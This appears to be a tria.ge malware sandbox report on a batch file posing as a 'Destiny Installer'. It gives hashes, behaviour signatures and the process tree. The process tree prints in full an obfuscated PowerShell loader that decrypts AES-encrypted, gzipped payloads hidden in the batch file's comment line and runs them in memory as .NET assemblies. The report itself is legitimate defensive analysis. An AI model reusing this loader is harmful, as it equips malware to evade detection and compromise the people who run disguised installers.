Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01/03/2025, 17:48
Static task
static1
Behavioral task
behavioral1
Sample
destiny installer/Destiny Installer.bat
Resource
win7-20240903-en
4 signatures
150 seconds
General
-
Target
destiny installer/Destiny Installer.bat
-
Size
327KB
-
MD5
2ae432966df2247f6019b7f4f92133b5
-
SHA1
ccffdee15b76f1239ff1552b0b5992b04753096b
-
SHA256
b7993ee9e7a074d2fd1a39756bf13e276722043be49e932a5c1540cecd7f7a61
-
SHA512
83b254cbfbaedca5904d761466d638de7b758986f572679cf80c0cafbd20ffd46dc4aa97c04ace4d650ea073a25459cf2d6ef32275e2ca1ce11e0d22fed1a569
-
SSDEEP
6144:IGuBeLEz1JHrfxWyiFwx5mnJ7x2AxQ4SEqxqH284++gGZzmdH2lXVKwT5gJy9pHC:ItBe6bHVWy7ATxQ49H284+dGZzUH21wd
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2320 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2320 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2320 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1992 wrote to memory of 2320 1992 cmd.exe 32 PID 1992 wrote to memory of 2320 1992 cmd.exe 32 PID 1992 wrote to memory of 2320 1992 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\destiny installer\Destiny Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbpOv5Dd20QS+jAUaxWzfQ8Ue7OWB/lZpkmUiDzmjXc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+oOxt502v2luXR//6oDybA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OrPUq=New-Object System.IO.MemoryStream(,$param_var); $PVXiG=New-Object System.IO.MemoryStream; $QksXF=New-Object System.IO.Compression.GZipStream($OrPUq, [IO.Compression.CompressionMode]::Decompress); $QksXF.CopyTo($PVXiG); $QksXF.Dispose(); $OrPUq.Dispose(); $PVXiG.Dispose(); $PVXiG.ToArray();}function execute_function($param_var,$param2_var){ $dhbrq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UQwuM=$dhbrq.EntryPoint; $UQwuM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\destiny installer\Destiny Installer.bat';$AwDLs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\destiny installer\Destiny Installer.bat').Split([Environment]::NewLine);foreach ($zLvFY in $AwDLs) { if ($zLvFY.StartsWith(':: ')) { $OBKgh=$zLvFY.Substring(3); break; }}$payloads_var=[string[]]$OBKgh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320
-